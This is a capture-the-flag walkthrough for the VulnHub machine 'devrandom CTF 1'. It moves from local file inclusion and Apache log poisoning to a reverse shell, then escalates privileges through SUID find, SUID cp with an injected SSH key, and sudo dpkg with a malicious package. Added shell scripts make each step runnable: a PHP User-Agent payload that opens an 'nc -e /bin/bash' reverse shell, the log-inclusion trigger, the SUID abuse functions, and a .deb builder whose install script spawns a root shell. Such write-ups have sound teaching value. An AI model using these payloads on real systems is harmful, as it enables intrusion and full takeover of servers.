devrandom CTF 1

In this article we are going to solve another boot2root challenge. It is a beginner-level box, and we can download it from VulnHub.


Walkthrough


As usual we first find the IP address of the target using the command: sudo netdiscover -i wlan0


Now, with nmap -A 192.168.43.45, we check for open ports and the services running on the target.

Only 2 ports are open, so we decided to enumerate the HTTP service. The website shows a very cool image saying the website is closed, so we dig further with a directory bruteforce, command used: sudo dirb http://192.168.43.45

Then we opened every discovered page one by one.


This file has 3 entries, and we opened each of them. The page /?include=info turned out to be vulnerable to LFI (local file inclusion): the value of the include parameter is used as a file path.

We tried to read different files on the system through it but found nothing useful. Since this is an LFI, we can perform a log poisoning attack and from there get a reverse shell.

To perform log poisoning we need to be able to include a log file such as access.log or auth.log, so we need to know where one lives. We ran the directory bruteforce again with dirbuster, this time with the php extension, and found the page /log.php.

Opening it, we found a very interesting file path in the very first line.

Now we have the path of the access.log file, and from here we can perform the log poisoning attack!

We opened the file /var/www/html/access.log through the LFI vulnerability, which confirms the web server can read it.

Next we intercept the request with Burp Suite. To poison the log we tamper with the User-Agent header, because Apache writes its value verbatim into access.log, and inject our code there!

As seen here, we injected our PHP code into the User-Agent header. When the poisoned log is included through the LFI, PHP executes the injected fragment and we get our reverse shell.

code: <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>

Note that the -e flag only exists in netcat builds that support it (nc.traditional, ncat); the OpenBSD netcat does not, so if the shell does not come back, try a different payload.

Now we have our reverse shell, and with the usual Python pty one-liner we upgrade it to an interactive shell.
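The two requests of the log poisoning attack described above, written out as an added example (this is not code from the original walkthrough), together with the check a defender would run against access.log afterwards. The attacker address, listener port and the exact value the include parameter needs (here the full path the walkthrough found) are assumptions; the sample log lines are constructed.

```shell
#!/bin/sh
# Added example: log poisoning through an LFI, plus a check for poisoned
# User-Agent entries. Target IP is the walkthrough's; LHOST/LPORT and the
# include= value are assumptions for this demo.

TARGET="${TARGET:-192.168.43.45}"
LHOST="${LHOST:-192.168.43.10}"   # attacker IP (assumption)
LPORT="${LPORT:-4444}"            # attacker listener port (assumption)
LOG_PATH="/var/www/html/access.log"   # path found via /log.php

# Step 1: plant the payload. Apache logs the User-Agent header verbatim,
# so whatever we send with -A is written into access.log unchanged.
poison_log() {
    curl -s -o /dev/null \
        -A "<?php echo shell_exec('nc -e /bin/bash $LHOST $LPORT'); ?>" \
        "http://$TARGET/"
}

# Step 2: include the poisoned log through the LFI. PHP parses the file,
# finds the <?php ... ?> fragment and runs it as the web server user.
# Start the listener first: nc -lvnp "$LPORT"
trigger_payload() {
    curl -s -o /dev/null "http://$TARGET/?include=$LOG_PATH"
}

# Defender's check: list log lines carrying PHP tags or command-execution
# calls. A hit here means the log was poisoned and must not be includable.
poisoned_entries() {
    grep -E -n '<\?(php|=)|shell_exec\(|system\(|passthru\(' "$1" || true
}

# Constructed sample access.log (combined log format): one normal request,
# one poisoned User-Agent, then the request that includes the log.
write_sample_log() {
    cat > "$1" <<'EOF'
192.168.43.10 - - [12/Aug/2020:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.43.10 - - [12/Aug/2020:10:01:30 +0000] "GET / HTTP/1.1" 200 612 "-" "<?php echo shell_exec('nc -e /bin/bash 192.168.43.10 4444'); ?>"
192.168.43.10 - - [12/Aug/2020:10:01:45 +0000] "GET /?include=/var/www/html/access.log HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
}

# Only fire the attack when explicitly asked for.
if [ "${RUN_ATTACK:-0}" = 1 ]; then
    poison_log
    trigger_payload
fi
```

Run with RUN_ATTACK=1 TARGET=... LHOST=... against the box; run `poisoned_entries /var/www/html/access.log` on the target (or on a copy of the log) to see the planted line. The second curl is what Burp's "include access.log" request does by hand.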

Now the privilege escalation part.

Typing ls shows the files in this directory, among them an interesting file, secret.php. With cat secret.php we checked its content and found the password of user victor as an MD5 hash. We cracked it and found the password to be irminsul.

Now we are in as user victor. We checked for sudo privileges with sudo -l but there was nothing, so we checked for SUID binaries with the command: find / -perm -u=s -type f 2>/dev/null

/home/victor/bin/find is very helpful for us: it is a SUID copy of find sitting outside the usual system directories, so we change our directory to /home/victor/bin.

As described on GTFOBins, a SUID find can be used for privilege escalation, because the command it runs through -exec inherits the binary owner's effective uid. Using the GTFOBins trick we are in as user john.

Next we change to /home/john, where we found a file named .private; its content was the text dropbox2010.

We used this as the password for user lisa and succeeded in logging in as lisa.

We again check for SUID binaries with the same command, and again there is an interesting binary inside /home/lisa/bin/, this time a copy of cp.

There are many privilege escalation methods with a SUID cp binary; here we succeeded with this one:

  • change directory to /tmp

  • generate a new key pair with ssh-keygen, which produces the files id_rsa and id_rsa.pub

  • copy id_rsa.pub to /home/henri/.ssh/authorized_keys using the SUID cp

  • connect over ssh as user henri using the id_rsa file

So we copy id_rsa.pub to /home/henri/.ssh/authorized_keys with the SUID cp (it runs with its owner's privileges, so it can write into henri's home), set the permissions of the private key with chmod 400 id_rsa, and then connect over ssh as user henri.
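Both SUID steps above (the find trick that gave us john and the cp trick that gave us henri) rely on the same fact: a SUID binary runs with its owner's effective uid, so anything it executes or writes happens as that user. The following added example (not code from the walkthrough or from GTFOBins) wraps the two tricks as functions. The paths /home/victor/bin/find and /home/lisa/bin/cp, the use of bash -p, and the assumption that henri's ~/.ssh directory already exists are mine.

```shell
#!/bin/sh
# Added example: abusing SUID copies of find and cp.
# Assumed binaries: /home/victor/bin/find and /home/lisa/bin/cp.

# GTFOBins find/SUID. find runs its -exec command with the euid of the
# binary's owner; bash -p keeps that euid instead of dropping it.
# A single start path plus -quit makes the command run exactly once.
suid_find_exec() {
    _find="$1"; shift
    "$_find" /dev/null -exec /bin/bash -p -c "$*" \; -quit
}

# GTFOBins cp/SUID. A SUID cp creates the destination as its owner, so it
# can drop our public key into another user's authorized_keys. No -p: that
# would preserve our ownership. umask 077 keeps the file 0600, since sshd
# refuses group/world-writable authorized_keys. Assumes $_home/.ssh exists.
install_authorized_key() {
    _cp="$1"; _pubkey="$2"; _home="$3"
    (umask 077; "$_cp" "$_pubkey" "$_home/.ssh/authorized_keys")
}

# Full sequence from the walkthrough, only when explicitly requested.
if [ "${RUN_ATTACK:-0}" = 1 ]; then
    # As victor: interactive shell as john (owner of the SUID find).
    # suid_find_exec /home/victor/bin/find 'id; exec /bin/bash -p'

    # As lisa: key pair, authorized_keys as henri, then ssh in.
    cd /tmp
    ssh-keygen -t rsa -b 4096 -f /tmp/id_rsa -N ''
    install_authorized_key /home/lisa/bin/cp /tmp/id_rsa.pub /home/henri
    chmod 400 /tmp/id_rsa
    ssh -i /tmp/id_rsa henri@127.0.0.1
fi
```

Check before relying on it: `ls -l /home/victor/bin/find /home/lisa/bin/cp` must show the s bit and the owner you expect (john and henri here); if the file system is mounted nosuid the bit is ignored and neither trick works.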

We are in as henri. We checked this user's home directory and found two things.

The dust directory was empty, so we checked for SUID binaries again and found this.

We change to /usr/local/bin, where the SUID binary owned by root lives. We execute it with ./cmd and we are in as user trevor.

This time, checking the user's sudo privileges with sudo -l gave a very interesting result.

Again with help from GTFOBins we found that dpkg run through sudo can be used for privilege escalation to a root shell!

For this we need a .deb package, x_1.0_all.deb, whose install script spawns a shell; dpkg runs that script as root during installation. We build the package on our Kali Linux machine and transfer it to the target.

We downloaded the package onto the target machine using wget.

Now install the package with: sudo -u root /usr/bin/dpkg -i x_1.0_all.deb, and we are in as user root!
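How the x_1.0_all.deb package is put together, as an added example (not the walkthrough's own build steps, which used a ready-made recipe): dpkg-deb builds a package from a directory containing a DEBIAN/control file and maintainer scripts, and dpkg -i runs those scripts as root, so a preinst that execs a shell hands out a root shell when trevor installs the package via sudo. Package name "x", version 1.0 and "Architecture: all" are chosen so the output name matches the file the walkthrough transfers.

```shell
#!/bin/sh
# Added example: build x_1.0_all.deb with dpkg-deb on the attacker machine.
# dpkg -i executes DEBIAN/preinst as root before unpacking, which is the
# whole privilege escalation.

stage_package() {
    _dir="$1"
    mkdir -p "$_dir/DEBIAN"
    # Minimal control file. Package/Version/Architecture determine the
    # output name: x_1.0_all.deb.
    cat > "$_dir/DEBIAN/control" <<'EOF'
Package: x
Version: 1.0
Section: misc
Priority: optional
Architecture: all
Maintainer: x <x@localhost>
Description: dpkg maintainer-script privilege escalation demo
EOF
    # preinst is run by dpkg as root; exec replaces it with a shell that
    # inherits dpkg's terminal, so the session stays interactive.
    cat > "$_dir/DEBIAN/preinst" <<'EOF'
#!/bin/sh
exec /bin/sh
EOF
    chmod 755 "$_dir/DEBIAN/preinst"
}

# With a directory as destination, dpkg-deb names the file from the
# control fields, giving <outdir>/x_1.0_all.deb.
build_package() {
    dpkg-deb --build "$1" "$2"
}

if [ "${BUILD_DEB:-0}" = 1 ]; then
    _stage=$(mktemp -d)
    stage_package "$_stage"
    build_package "$_stage" .
fi
```

Run with BUILD_DEB=1 on Kali, serve the file (for example with python3 -m http.server), fetch it on the target with wget, and install it with the sudo command above. The precondition to verify first is that sudo -l for trevor lists /usr/bin/dpkg; without that line the package installs nothing and the shell never appears.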

Now let us read the final flag by executing this command.

Yippee!! The challenge is finally completed!


NOTE: This is the intended way to solve this machine. A second method is to bruteforce the password of user trevor and then follow the dpkg part to get root the easy way! But following the first approach is much more beneficial for us.


If we follow the approach described in this article, then I would rate this machine as intermediate level for a beginner in CTF challenges, because there are many things to learn about privilege escalation.



© 2020 by HacLabs.